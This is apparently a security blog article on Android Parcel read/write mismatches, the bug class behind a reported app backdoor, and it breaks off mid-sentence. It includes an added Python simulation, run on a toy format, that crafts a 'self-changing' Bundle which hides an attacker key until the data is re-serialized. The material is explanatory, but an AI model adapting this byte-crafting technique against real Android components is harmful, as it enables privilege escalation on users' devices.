
When an App has System Privileges, Can It Really Do Whatever It Wants?

11 min read · Mar 10, 2023

Background

Analysis of the privilege-escalation code embedded in the XXX APK and of the dex it delivers dynamically: https://github.com/davinci1010/pinduoduo_backdoor

How this app obtains its system privileges is explained clearly in the article "The Most Unforgivable Vulnerability in 2022", so I will not repeat it here.

A core object-passing mechanism in the Android framework is Parcel. An object sent through a Parcel implements the Parcelable interface: writeToParcel serializes its fields, and the matching read side (createFromParcel, usually delegating to a readFromParcel) restores them. In theory the two functions should be exact inverses of each other, but system ROM developers sometimes write mismatched pairs, for example writeLong on the write side and readInt on the read side. Such a mismatch usually goes unnoticed in normal operation, causing neither crashes nor errors, but an attacker who lays out the surrounding bytes carefully can use the Settings and system_server processes to turn this minor slip into a StartAnyWhere primitive. Android has fixed hundreds of vulnerabilities of this kind in recent years, and Android 13 reworked the Parcel mechanism to eliminate most of this attack surface.
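The following simulation is an added example and is not code from the article or from the linked repository. It models Parcel and Bundle as a toy byte format (4-byte ints, 8-byte longs, length-prefixed strings padded to 4 bytes, and a Bundle that reads exactly `count` entries and ignores trailing bytes) and defines a hypothetical Parcelable, `Tracker`, with the exact mismatch described above: writeLong on the way out, readInt on the way in. It then goes one step beyond the paragraph and shows how an attacker turns that 4-byte drift into a "self-changing" Bundle: the raw bytes the attacker sends parse to three harmless keys, but once a privileged process re-serializes what it parsed and hands it on, the next reader finds a key that was never visible before. The key and value names (`target`, `com.victim/.Internal`) and the 0x1234 timestamp are constructed for the demonstration.

```python
import struct

# Type tags of this toy Bundle (constructed for the simulation, not Android's real tags).
INT, STRING, PARCELABLE = 0, 1, 2


class Parcel:
    """Stand-in for android.os.Parcel: little-endian 4-byte ints, 8-byte longs,
    length-prefixed strings padded to a 4-byte boundary, one shared read cursor."""

    def __init__(self, data=b""):
        self.buf = bytearray(data)
        self.pos = 0

    def write_int(self, v):
        self.buf += struct.pack("<i", v)

    def write_long(self, v):
        self.buf += struct.pack("<q", v)

    def write_string(self, s):
        raw = s.encode("latin-1")          # latin-1 keeps arbitrary byte values round-trippable
        self.write_int(len(raw))
        self.buf += raw + b"\0" * (-len(raw) % 4)

    def read_int(self):
        (v,) = struct.unpack_from("<i", self.buf, self.pos)
        self.pos += 4
        return v

    def read_long(self):
        (v,) = struct.unpack_from("<q", self.buf, self.pos)
        self.pos += 8
        return v

    def read_string(self):
        n = self.read_int()
        raw = bytes(self.buf[self.pos:self.pos + n])
        self.pos += n + (-n % 4)
        return raw.decode("latin-1")


class Tracker:
    """Hypothetical Parcelable with the mismatch from the text: writeLong out, readInt in.
    Nothing crashes; the read cursor simply ends up 4 bytes short of where the writer was."""

    def __init__(self, ts):
        self.ts = ts

    def write_to_parcel(self, p):
        p.write_long(self.ts)              # emits 8 bytes

    @staticmethod
    def create_from_parcel(p):
        return Tracker(p.read_int())       # consumes only 4 bytes


PARCELABLES = {"Tracker": Tracker}


def write_bundle(entries):
    """Serialize a dict the way Bundle does: count, then key / type tag / value per entry."""
    p = Parcel()
    p.write_int(len(entries))
    for key, value in entries.items():
        p.write_string(key)
        if isinstance(value, int):
            p.write_int(INT); p.write_int(value)
        elif isinstance(value, str):
            p.write_int(STRING); p.write_string(value)
        else:
            p.write_int(PARCELABLE); p.write_string(type(value).__name__)
            value.write_to_parcel(p)
    return bytes(p.buf)


def read_bundle(data):
    """Parse exactly `count` entries; bytes after the last entry are ignored, as Bundle does."""
    p = Parcel(data)
    out = {}
    for _ in range(p.read_int()):
        key = p.read_string()
        tag = p.read_int()
        if tag == INT:
            out[key] = p.read_int()
        elif tag == STRING:
            out[key] = p.read_string()
        elif tag == PARCELABLE:
            out[key] = PARCELABLES[p.read_string()].create_from_parcel(p)
        else:
            raise ValueError("unknown type tag %d" % tag)
    return out


def craft_self_changing_bundle(hidden_key, hidden_value):
    """Attacker-built raw bytes. Tracker occupies the 4 bytes the *reader* expects, so the first
    parse looks harmless. Re-serialization writes the long back as 8 bytes; its 4 upper zero
    bytes then read as an empty key, the key-length field of "a" (1) reads as the STRING tag,
    and the byte 'a' (0x61) reads as a 97-byte junk string. The hidden entry is placed inside
    the "filler" string value so that it starts exactly where that junk string ends."""
    hidden = Parcel()
    hidden.write_string(hidden_key); hidden.write_int(STRING); hidden.write_string(hidden_value)
    junk_end = 8 + ord("a") + (-ord("a") % 4)   # offset of the hidden entry, relative to entry "a"
    filler_value_start = 16 + 4 + 8 + 4 + 4     # entry "a" (16) + key "filler" (12) + tag + length
    filler = "." * (junk_end - filler_value_start) + bytes(hidden.buf).decode("latin-1")
    p = Parcel()
    p.write_int(3)
    p.write_string("t"); p.write_int(PARCELABLE); p.write_string("Tracker"); p.write_int(0x1234)
    p.write_string("a"); p.write_int(INT); p.write_int(0)
    p.write_string("filler"); p.write_int(STRING); p.write_string(filler)
    return bytes(p.buf)


def demo():
    raw = craft_self_changing_bundle("target", "com.victim/.Internal")  # constructed key/value
    first = read_bundle(raw)             # what the first consumer (the one doing the checks) sees
    forwarded = write_bundle(first)      # a privileged process re-serializes its parsed copy
    second = read_bundle(forwarded)      # what the next consumer sees
    return first, second


if __name__ == "__main__":
    first, second = demo()
    print("first parse keys :", sorted(first))
    print("second parse keys:", sorted(second))
    print("hidden value     :", second.get("target"))
```

Run it and the first parse shows only `t`, `a` and `filler`, while the second parse shows `t`, an empty key holding junk, and `target` with the attacker's value: any check performed on the first parse never saw the key that the second consumer acts on. This is also why per-value length prefixes (the approach Android 13 takes for Bundle values) close the hole: a reader that skips to the recorded end of each value no longer depends on readFromParcel consuming exactly as many bytes as writeToParcel produced.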

However, for HarmonyOS (Hong Meng) and the vast majority of devices and users who have not…


Written by CybersecInfo

CyberSecurity Beginner | Penetration Tester | Security Researcher | CISSP | "motorcyclist"
